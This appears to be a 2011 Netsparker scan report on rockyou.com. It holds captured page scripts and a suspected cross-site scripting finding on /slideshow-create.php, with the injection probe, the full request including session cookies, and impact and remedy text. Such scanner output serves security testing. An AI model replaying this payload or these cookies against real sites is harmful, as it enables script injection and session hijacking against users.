Uma vez confirmada, você vai criar imediatamente uma senha para o RockYou.</span>"; generateBubbleEmbed('emailPWBubble', 250, 180, 'LT', emailVerificationBubbleText); document.getElementById('emailNameSpan').innerHTML = emailName; document.getElementById('emailNameSpan2').innerHTML = emailName; document.getElementById('emailAddressSpan').innerHTML = document.getElementById('email').value; document.getElementById('emailPW').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-emailPW-begin&value=mainlogin',null,null); } else { document.getElementById('registrationContainer').style.display = ''; var captchaDiv = document.getElementById('captchaDiv'); var captchaDivReg = document.getElementById('captchaDivReg'); if(captchaDivReg.innerHTML==''){ captchaDivReg.innerHTML = captchaDiv.innerHTML; captchaDiv.innerHTML = ''; } document.getElementById('newPW').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-registration-begin&value=mainlogin',null,null); } } else { document.getElementById('emailContainer').style.display = 'none'; // Move to rockyou password form document.getElementById('rockyouPWContainer').style.display = ''; var captchaDiv = document.getElementById('captchaDiv'); var captchaDivReg = document.getElementById('captchaDivReg'); if(captchaDiv.innerHTML==''){ captchaDiv.innerHTML = captchaDivReg.innerHTML; captchaDivReg.innerHTML = ''; } document.getElementById('emailAddressSpanRockyou').innerHTML = document.getElementById('email').value; document.getElementById('rockyouPW').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-rockyouPW-begin&value=mainlogin',null,null); } }}// Check if email account existence can be verified by scripts (if so use email and email name to fill out email password form text).function isVerifiableEmail() { return false; /* var email = document.getElementById('email').value; var emailParts = email.split('@'); emailParts = emailParts[1].split('.'); var emailDomain = emailParts[0]; var emailType = ''; switch(emailDomain.toLowerCase()) { case 'gmail': emailType = 'Gmail'; break; case 'yahoo': emailType = 'Yahoo'; break; case 'aol': emailType = 'AOL'; break; //case 'msn': //emailType = 'MSN'; break; //case 'hotmail': //emailType = 'Hotmail'; break; } return emailType;*/}// ------------------- External Email Account Verification Form Functions -------------------------function emailPWBack() { document.getElementById('emailPWContainer').style.display = 'none'; document.getElementById('emailContainer').style.display = ''; document.getElementById('email').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-emailPW-back&value=mainlogin',null,null); return false;}function emailPWChange(event) { if (event && (event.keyCode == 13 || event.which == 13)) { emailPWFormSubmit(); } else errorToggle('emailPW',false); }// Check email account exists (for verifiable accounts) with third party scriptsfunction emailPWFormSubmit() { var email = document.getElementById('email').value; var password = document.getElementById('emailPW').value; if (!email || !password || showLoading.loading) return false; else showLoading(true); errorToggle('emailPW',false); ajax_post_john( sslHost + '/login/loginProcessor.php', 'stage=verifyExternalAccount&email='+email+'&password='+password, null, emailPWCallback); return false; }function emailPWCallback(responseText) { showLoading(false); eval('var response='+responseText+';'); if (response['error']) alert(response['error']); errorToggle('emailPW', !response['externalAccountVerified']); if (response['externalAccountVerified']) { document.getElementById('emailPWContainer').style.display='none'; document.getElementById('registrationContainer').style.display=''; var captchaDiv = document.getElementById('captchaDiv'); var captchaDivReg = document.getElementById('captchaDivReg'); if(captchaDivReg.innerHTML==''){ captchaDivReg.innerHTML = captchaDiv.innerHTML; captchaDiv.innerHTML = ''; } document.getElementById('newPW').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-registration-begin&value=mainlogin',null,null); }}// ----------------------- Rockyou Password Verification Form Functions ------------------------function rockyouPWChange(event) { if (event && (event.keyCode == 13 || event.which == 13)) { rockyouPWFormSubmit(); } else errorToggle('rockyouPW',false); }function rockyouPWBack() { document.getElementById('rockyouPWContainer').style.display = 'none'; document.getElementById('emailContainer').style.display = ''; document.getElementById('email').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-rockyouPW-back&value=mainlogin',null,null); return false; }function rockyouPWFormSubmit() { var email = document.getElementById('email').value; var password = document.getElementById('rockyouPW').value; var error; if (!email || !password || showLoading.loading) return false; else if (error = getPWFormatError(password)) { window.location = nonsslHost + '/resetpassword.php?pwFormatError='+escape(error); } else { showLoading(true); var recaptcha_response_field = document.getElementById('recaptcha_response_field').value; var recaptcha_challenge_field = document.getElementById('recaptcha_challenge_field').value; ajax_post_john( sslHost + '/login/loginProcessor.php', 'stage=verifyRockyouPassword&email='+email+'&password='+password+'&recaptcha_challenge_field='+recaptcha_challenge_field+'&recaptcha_response_field='+recaptcha_response_field, null, rockyouPWCallback); } return false; }function rockyouPWCallback(responseText) { showLoading(false); eval('var response='+responseText+';'); if (response['error']) alert(response['error']); else if (response['validLogin']) { var password = document.getElementById('rockyouPW').value; var destination = ''; destination = "http://rockyou.com/my_stuff.php"; destination += (destination.indexOf('?') == -1) ? '?' :'&'; destination += "loginType=ryLogin&email="+encodeURIComponent(document.getElementById('email').value); window.location = destination; } else { errorToggle('rockyouPW', true); document.getElementById('rockyouPW').focus(); } }// --------------------------- Rockyou Registration Form Functions ------------------------------function registrationBack() { document.getElementById('registrationContainer').style.display = 'none'; document.getElementById('emailContainer').style.display = ''; document.getElementById('email').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-registration-back&value=mainlogin',null,null); return false; }// Enforce character and length restrictionsfunction filterPasswordInput(event) { var inputLength = document.getElementById('newPW').value.length; // Match alphanumerical and spaces. var keyChar = (event.which) ? String.fromCharCode(event.which) : String.fromCharCode(event.keyCode); var reg = /[\w\s\b]$/; var isValid = reg.test(keyChar); return isValid;}function newPWBlur() { var error = getPWFormatError(document.getElementById('newPW').value); if (error) { errorToggle('newPW', true, error); }}// Returns error string if password is not secure.function getPWFormatError(password) { notSecure = [ "password1", ]; for (var i = 0; i < notSecure.length; i++) { if (notSecure[i] == password) { return 'Your password was found in a list of insecure passwords. Please choose another.'; } } if (password.length < 8) { return 'Password must be at least 8 characters long.'; } if (password.length > 15) { return 'Password must be 15 characters or less.'; } if (password.search(/[0-9]/) == -1) { return 'Password must contain at least one number'; } if (password.search(/[a-zA-z]/) == -1) { return 'Password must contain at least one letter.'; } return '';}function newPasswordKeyUp() { var pwLength = document.getElementById('newPW').value.length; if (pwLength >= 8 && document.getElementById('newPWBubble').style.display == 'none') { errorToggle('newPW',false); } }// Ensure that what is being typed into the reenter password input matches the password entered previouslyfunction checkReenterInput(event) { if (event && (event.keyCode == 9 || event.which == 9)) return; var retypedPW = document.getElementById('retype').value; if (!retypedPW) return; var newPW = document.getElementById('newPW').value; // If the password doesn't match the original (so far), give warning errorToggle('retype',newPW.indexOf(retypedPW) != 0); }function retypeBlur() { var retypedPW = document.getElementById('retype').value; if (!retypedPW) return; var newPW = document.getElementById('newPW').value; // If the password doesn't match the original, give warning errorTog..
Date: Mon, 18 Apr 2011 21:55:28 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:55:27 GMT; path=/; domain=.rockyou.com,lastlogin=1303163728; expires=Wed, 27-Jul-2011 21:55:28 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 21:55:28 GMT; path=/; domain=.rockyou.com
X-RyHeader: www164.rockyou.com took D=9663 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<script>
function redir() {
var redirForm = document.getElementById('redirect_form');
if(redirForm != null & redirForm != undefined){
document.getElementById('redirect_form').submit();
}
}
window.onload=redir;
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/login.css.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Ajuda</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<br>
<div style="text-align:center">
<div style="background-color:#DDD;margin:auto;width:730px;padding:15px;">
<script type="text/javascript" language="javascript" src="https://rockyou.com/contents/login/ajax.js"></script>
<script>// Globalsvar isIE6; // Whether the user has ie6. Look for references to it to find IE6 workarounds.var sslHost = "https://" + window.location.hostname; var nonsslHost = "http://" + window.location.hostname; // Show bubble or error on focus, depending on state.function showHelp(inputID) { if (showHelp.curHelpShown != inputID) { if (showHelp.curHelpShown && showHelp.curHelpShown != inputID) document.getElementById(showHelp.curHelpShown+'Help').style.display = 'none'; showHelp.curHelpShown = inputID; var helpDiv = document.getElementById(inputID+'Help'); if (helpDiv) helpDiv.style.display = ''; var inputBubble = document.getElementById(inputID+'Bubble'); if (inputBubble && !inputBubble.innerHTML) generateBubbleEmbed(inputID+'Bubble', 250, 180, 'LT', eval(inputID+'BubbleText')); if (isIE6) if (inputID=='newPW'||inputID=='retype') document.getElementById(inputID+'Help').focus(); }}// Toggle input specified by id to show or not show error statusfunction errorToggle(id, showError, errorText) { if (showError) { document.getElementById(id+'Bubble').style.display = 'none'; document.getElementById(id+'Error').style.display = ''; if (errorText) document.getElementById(id+'Error').innerHTML = errorText; var inputDiv = document.getElementById(id+'Div'); inputDiv.style.color="red"; } else { document.getElementById(id+'Bubble').style.display = ''; document.getElementById(id+'Error').style.display = 'none'; var inputDiv = document.getElementById(id+'Div'); inputDiv.style.color="black"; }}function showLoading(loading) { // Holds publically accessible boolean, whether currently processing a request showLoading.loading = loading; if (loading) { document.getElementById('loadingDiv').style.display = ''; showLoading.hiddenHelp = showHelp.curHelpShown; showHelp(''); } else { document.getElementById('loadingDiv').style.display = 'none'; showHelp(showLoading.hiddenHelp); }}// Used only if skip button availablefunction promptNoSave() { if (confirm("Tem certeza? (Não poderá voltar e editar depois disso!)")) { var destination = ""; destination += (destination.indexOf('?') == -1) ? '?' : '&'; destination += "loginType=skipped"; window.location = destination; }}// -------------- EMAIL FORM FUNCTIONS --------------------// Check if email input is proper format and store result in static emailFormChange variablefunction emailInputValid() { var emailInput = document.getElementById('email'); var reg = /^([\w-]+)(\.[\w-]+)*@([\w\-\.])+\.[A-Za-z]{2,4}$/; emailFormChange.emailIsValid = reg.test(emailInput.value); return emailFormChange.emailIsValid; }// Remove error if the form has gone from invalid to validfunction emailFormChange(event) { if (event && (event.keyCode == 13 || event.which == 13)) { emailFormSubmit(); } else if (!emailFormChange.emailIsValid) { emailFormChange.emailIsValid = emailInputValid(); if (emailFormChange.emailIsValid) errorToggle('email',false); } return false; }// Set form state to invalid and show error if incorrect format. Otherwise submit to check if already registered.function emailFormSubmit() { if (showLoading.loading) return false; var emailInput = document.getElementById('email'); emailFormChange.emailIsValid = emailInputValid(); if (emailFormChange.emailIsValid) { showLoading(true); ajax_post_john(sslHost + '/login/loginProcessor.php', 'stage=checkEmailRegistration&email='+emailInput.value, null, emailFormCallback); } else { // Track failure. Show error. ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-email-submit-failed&value=mainlogin',null,null); errorToggle('email',true); emailInput.focus(); } return false; }function emailFormCallback(responseText) { showLoading(false); eval('var response='+responseText+';'); if (response['error']) { alert(response['error']); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-email-submit-failed&value=mainlogin',null,null); } else { if (!response['emailRegistered']) { // Check if this email is close but not equal to a common domain name. if (response['possibleTypo']) { var confirmText = 'You may have a typo in your email.\nWe Suggest: '+response['possibleTypo']; confirmText += '\nClick OK to continue or Cancel to re-enter your email.'; // If cancel is pressed, stay on the current page. Otherwise, continue as normal. if (!confirm(confirmText)) { document.getElementById('email').focus(); return; } } // Move to registration form if email cannot be validated. If it can, move to email account validation form. var emailName = ''; document.getElementById('emailContainer').style.display = 'none'; if (emailName = isVerifiableEmail()) { document.getElementById('emailPWContainer').style.display = ''; // Transfer and create data for email password form if (!emailVerificationBubbleText) var emailVerificationBubbleText = '<span class="leftAlign"><span class="headerThree">'+dynLang('Boa vinda, usuário do [EmailType]!', 'EmailType', emailName)+'</span>\n '+dynLang('Por favor, confirme a sua conta entrando a sua senha do seu [EmailType].', 'EmailType', emailName)+ "<br> N∫ao se preocupe, este é o único lugar que você precisa checar se a sua conta existe. Nós não iremos armazenar a sua senha. Uma vez confirmada, você vai criar imediatamente uma senha para o RockYou.</span>"; generateBubbleEmbed('emailPWBubble', 250, 180, 'LT', emailVerificationBubbleText); document.getElementById('emailNameSpan').innerHTML = emailName; document.getElementById('emailNameSpan2').innerHTML = emailName; document.getElementById('emailAddressSpan').innerHTML = document.getElementById('email').value; document.getElementById('emailPW').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-emailPW-begin&value=mainlogin',null,null); } else { document.getElementById('registrationContainer').style.display = ''; var captchaDiv = document.getElementById('captchaDiv'); var captchaDivReg = document.getElementById('captchaDivReg'); if(captchaDivReg.innerHTML==''){ captchaDivReg.innerHTML = captchaDiv.innerHTML; captchaDiv.innerHTML = ''; } document.getElementById('newPW').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-registration-begin&value=mainlogin',null,null); } } else { document.getElementById('emailContainer').style.display = 'none'; // Move to rockyou password form document.getElementById('rockyouPWContainer').style.display = ''; var captchaDiv = document.getElementById('captchaDiv'); var captchaDivReg = document.getElementById('captchaDivReg'); if(captchaDiv.innerHTML==''){ captchaDiv.innerHTML = captchaDivReg.innerHTML; captchaDivReg.innerHTML = ''; } document.getElementById('emailAddressSpanRockyou').innerHTML = document.getElementById('email').value; document.getElementById('rockyouPW').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-rockyouPW-begin&value=mainlogin',null,null); } }}// Check if email account existence can be verified by scripts (if so use email and email name to fill out email password form text).function isVerifiableEmail() { return false; /* var email = document.getElementById('email').value; var emailParts = email.split('@'); emailParts = emailParts[1].split('.'); var emailDomain = emailParts[0]; var emailType = ''; switch(emailDomain.toLowerCase()) { case 'gmail': emailType = 'Gmail'; break; case 'yahoo': emailType = 'Yahoo'; break; case 'aol': emailType = 'AOL'; break; //case 'msn': //emailType = 'MSN'; break; //case 'hotmail': //emailType = 'Hotmail'; break; } return emailType;*/}// ------------------- External Email Account Verification Form Functions -------------------------function emailPWBack() { document.getElementById('emailPWContainer').style.display = 'none'; document.getElementById('emailContainer').style.display = ''; document.getElementById('email').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-emailPW-back&value=mainlogin',null,null); return false;}function emailPWChange(event) { if (event && (event.keyCode == 13 || event.which == 13)) { emailPWFormSubmit(); } else errorToggle('emailPW',false); }// Check email account exists (for verifiable accounts) with third party scriptsfunction emailPWFormSubmit() { var email = document.getElementById('email').value; var password = document.getElementById('emailPW').value; if (!email || !password || showLoading.loading) return false; else showLoading(true); errorToggle('emailPW',false); ajax_post_john( sslHost + '/login/loginProcessor.php', 'stage=verifyExternalAccount&email='+email+'&password='+password, null, emailPWCallback); return false; }function emailPWCallback(responseText) { showLoading(false); eval('var response='+responseText+';'); if (response['error']) alert(response['error']); errorToggle('emailPW', !response['externalAccountVerified']); if (response['externalAccountVerified']) { document.getElementById('emailPWContainer').style.display='none'; document.getElementById('registrationContainer').style.display=''; var captchaDiv = document.getElementById('captchaDiv'); var captchaDivReg = document.getElementById('captchaDivReg'); if(captchaDivReg.innerHTML==''){ captchaDivReg.innerHTML = captchaDiv.innerHTML; captchaDiv.innerHTML = ''; } document.getElementById('newPW').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-registration-begin&value=mainlogin',null,null); }}// ----------------------- Rockyou Password Verification Form Functions ------------------------function rockyouPWChange(event) { if (event && (event.keyCode == 13 || event.which == 13)) { rockyouPWFormSubmit(); } else errorToggle('rockyouPW',false); }function rockyouPWBack() { document.getElementById('rockyouPWContainer').style.display = 'none'; document.getElementById('emailContainer').style.display = ''; document.getElementById('email').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-rockyouPW-back&value=mainlogin',null,null); return false; }function rockyouPWFormSubmit() { var email = document.getElementById('email').value; var password = document.getElementById('rockyouPW').value; var error; if (!email || !password || showLoading.loading) return false; else if (error = getPWFormatError(password)) { window.location = nonsslHost + '/resetpassword.php?pwFormatError='+escape(error); } else { showLoading(true); var recaptcha_response_field = document.getElementById('recaptcha_response_field').value; var recaptcha_challenge_field = document.getElementById('recaptcha_challenge_field').value; ajax_post_john( sslHost + '/login/loginProcessor.php', 'stage=verifyRockyouPassword&email='+email+'&password='+password+'&recaptcha_challenge_field='+recaptcha_challenge_field+'&recaptcha_response_field='+recaptcha_response_field, null, rockyouPWCallback); } return false; }function rockyouPWCallback(responseText) { showLoading(false); eval('var response='+responseText+';'); if (response['error']) alert(response['error']); else if (response['validLogin']) { var password = document.getElementById('rockyouPW').value; var destination = ''; destination = "http://rockyou.com/my_stuff.php"; destination += (destination.indexOf('?') == -1) ? '?' :'&'; destination += "loginType=ryLogin&email="+encodeURIComponent(document.getElementById('email').value); window.location = destination; } else { errorToggle('rockyouPW', true); document.getElementById('rockyouPW').focus(); } }// --------------------------- Rockyou Registration Form Functions ------------------------------function registrationBack() { document.getElementById('registrationContainer').style.display = 'none'; document.getElementById('emailContainer').style.display = ''; document.getElementById('email').focus(); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-registration-back&value=mainlogin',null,null); return false; }// Enforce character and length restrictionsfunction filterPasswordInput(event) { var inputLength = document.getElementById('newPW').value.length; // Match alphanumerical and spaces. var keyChar = (event.which) ? String.fromCharCode(event.which) : String.fromCharCode(event.keyCode); var reg = /[\w\s\b]$/; var isValid = reg.test(keyChar); return isValid;}function newPWBlur() { var error = getPWFormatError(document.getElementById('newPW').value); if (error) { errorToggle('newPW', true, error); }}// Returns error string if password is not secure.function getPWFormatError(password) { notSecure = [ "password1", ]; for (var i = 0; i < notSecure.length; i++) { if (notSecure[i] == password) { return 'Your password was found in a list of insecure passwords. Please choose another.'; } } if (password.length < 8) { return 'Password must be at least 8 characters long.'; } if (password.length > 15) { return 'Password must be 15 characters or less.'; } if (password.search(/[0-9]/) == -1) { return 'Password must contain at least one number'; } if (password.search(/[a-zA-z]/) == -1) { return 'Password must contain at least one letter.'; } return '';}function newPasswordKeyUp() { var pwLength = document.getElementById('newPW').value.length; if (pwLength >= 8 && document.getElementById('newPWBubble').style.display == 'none') { errorToggle('newPW',false); } }// Ensure that what is being typed into the reenter password input matches the password entered previouslyfunction checkReenterInput(event) { if (event && (event.keyCode == 9 || event.which == 9)) return; var retypedPW = document.getElementById('retype').value; if (!retypedPW) return; var newPW = document.getElementById('newPW').value; // If the password doesn't match the original (so far), give warning errorToggle('retype',newPW.indexOf(retypedPW) != 0); }function retypeBlur() { var retypedPW = document.getElementById('retype').value; if (!retypedPW) return; var newPW = document.getElementById('newPW').value; // If the password doesn't match the original, give warning errorTog..
[Possible] Cross-site Scripting
[Possible] Cross-site Scripting
9
TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /slideshow-create.php
/slideshow-create.php |
http://www.rockyou.com/slideshow-create.php?refid=&nsextt='%22%3E%3Cnet%20sparker=alert(0x000BBB)%3E
Parameters
| Parameter | Type | Value |
| refid | GET | |
| nsextt | GET | '"><net sparker=alert(0x000BBB)> |
Request
GET /slideshow-create.php?refid=&nsextt='%22%3E%3Cnet%20sparker=netsparker(0x000BBB)%3E HTTP/1.1
Referer: http://www.rockyou.com/help/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164249; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/help/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164249; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:04:10 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:04:09 GMT; path=/; domain=.rockyou.com,lastlogin=1303164250; expires=Wed, 27-Jul-2011 22:04:10 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:04:10 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=28675 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26906
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
